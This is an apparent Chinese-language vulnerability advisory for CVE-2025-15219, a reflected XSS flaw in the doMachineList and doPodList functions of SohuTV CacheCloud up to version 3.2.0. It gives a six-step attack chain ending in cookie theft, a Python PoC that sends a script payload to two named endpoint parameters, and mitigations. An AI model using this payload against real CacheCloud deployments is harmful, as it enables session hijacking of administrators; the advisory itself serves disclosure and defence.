CVE-2025-15219 SohuTV CacheCloud doMachineList/doPodList函数XSS跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-15219

漏洞类型

XSS跨站脚本

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

SohuTV CacheCloud

漏洞概述

CVE-2025-15219是SohuTV CacheCloud系统中存在的一个跨站脚本(XSS)安全漏洞。该漏洞影响CacheCloud版本直至3.2.0。问题出现在MachineManageController.java文件中的doMachineList和doPodList函数，由于对用户输入未进行充分的输入验证和输出编码，攻击者可以通过构造恶意的JavaScript脚本在受害者浏览器中执行。攻击者需要具备低权限用户身份，并诱导受害者进行交互操作才能成功利用此漏洞。该漏洞的CVSS评分为3.5，属于低危级别，攻击向量为网络形式，可远程利用。SohuTV CacheCloud是一个广泛使用的分布式缓存管理系统，用于企业级Redis集群管理和运维监控。该漏洞已被公开披露并提供了利用代码，GitHub上已有相关issue报告(issue #377和#378)，但项目方尚未对此作出响应。漏洞的存在可能导致敏感信息泄露、会话劫持等安全问题，对使用该系统的企业构成潜在安全风险。

技术细节

该漏洞位于SohuTV CacheCloud的MachineManageController控制器类中，具体涉及doMachineList和doPodList两个函数。攻击原理是应用程序在处理用户请求参数时，直接将用户输入的内容渲染到HTML页面响应中，而未对特殊字符进行HTML实体编码或移除可执行脚本内容。当攻击者通过URL参数或表单提交包含JavaScript脚本的数据时，这些恶意代码会被浏览器解析执行。攻击者可以利用此漏洞窃取受害者的认证cookie、劫持用户会话、执行任意操作或重定向用户到恶意网站。由于漏洞需要用户交互(UI:R)才能触发，攻击者通常会构造钓鱼链接或嵌入恶意脚本的页面诱导管理员点击。漏洞的认证要求为低权限(PR:L)，意味着普通注册用户即可尝试发起攻击。修复方案应在输出点对所有用户可控数据进行HTML编码，或在输入点实施严格的输入验证白名单机制。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标系统使用SohuTV CacheCloud版本<=3.2.0，确认MachineManageController接口存在

STEP 2

步骤2: 构造恶意载荷

攻击者构造包含恶意JavaScript代码的XSS payload，如<script>alert(document.cookie)</script>

STEP 3

步骤3: 诱骗受害者

攻击者通过钓鱼邮件、即时消息等方式诱导具有低权限的管理员或用户点击构造好的恶意链接

STEP 4

步骤4: 触发漏洞

受害者浏览器访问包含恶意载荷的URL，服务器未进行输入验证和输出编码直接将payload返回

STEP 5

步骤5: 脚本执行

受害者浏览器解析响应时执行注入的JavaScript代码，攻击者获取受害者cookie或会话令牌

STEP 6

步骤6: 会话劫持

攻击者利用窃取的认证信息冒充受害者进行进一步恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2025-15219 PoC - SohuTV CacheCloud XSS Vulnerability
# Target: MachineManageController.java doMachineList/doPodList functions

target_url = "http://target-server/cachecloud"

# XSS payload for doMachineList function
xss_payload = '<script>alert(document.cookie)</script>'
encoded_payload = urllib.parse.quote(xss_payload)

# PoC for doMachineList endpoint
doMachineList_url = f"{target_url}/machineManage/doMachineList?machineName={encoded_payload}"

# PoC for doPodList endpoint
doPodList_url = f"{target_url}/machineManage/doPodList?podName={encoded_payload}"

print("[*] CVE-2025-15219 SohuTV CacheCloud XSS PoC")
print(f"[*] Target: {target_url}")
print(f"[*] Testing doMachineList endpoint...")

try:
    response = requests.get(doMachineList_url, timeout=10)
    if xss_payload in response.text or encoded_payload in response.text:
        print("[+] Potential XSS vulnerability detected!")
        print(f"[+] Vulnerable URL: {doMachineList_url}")
    else:
        print("[-] No obvious XSS reflection found")
except requests.RequestException as e:
    print(f"[-] Request failed: {e}")

print(f"[*] Testing doPodList endpoint...")

try:
    response = requests.get(doPodList_url, timeout=10)
    if xss_payload in response.text or encoded_payload in response.text:
        print("[+] Potential XSS vulnerability detected!")
        print(f"[+] Vulnerable URL: {doPodList_url}")
    else:
        print("[-] No obvious XSS reflection found")
except requests.RequestException as e:
    print(f"[-] Request failed: {e}")

影响范围

SohuTV CacheCloud <= 3.2.0

防御指南

临时缓解措施

临时缓解措施：在Web应用防火墙(WAF)层面配置XSS防护规则，对包含<script>、javascript:等敏感关键词的请求参数进行拦截或编码处理；禁用受影响接口的非必要访问权限，仅允许受信任的管理员IP访问MachineManageController相关功能；对应用程序进行紧急补丁部署前的临时安全加固，监控异常请求日志。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15219
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15219
3 Details https://www.cvedetails.com/cve/CVE-2025-15219/
4 VulDB https://vuldb.com/cve/CVE-2025-15219
5 Link https://github.com/sohutv/cachecloud/issues/377
6 Link https://github.com/sohutv/cachecloud/issues/378
7 Link https://vuldb.com/?ctiid.338604
8 Link https://vuldb.com/?id.338604
9 Link https://vuldb.com/?submit.716318
10 Link https://vuldb.com/?submit.716319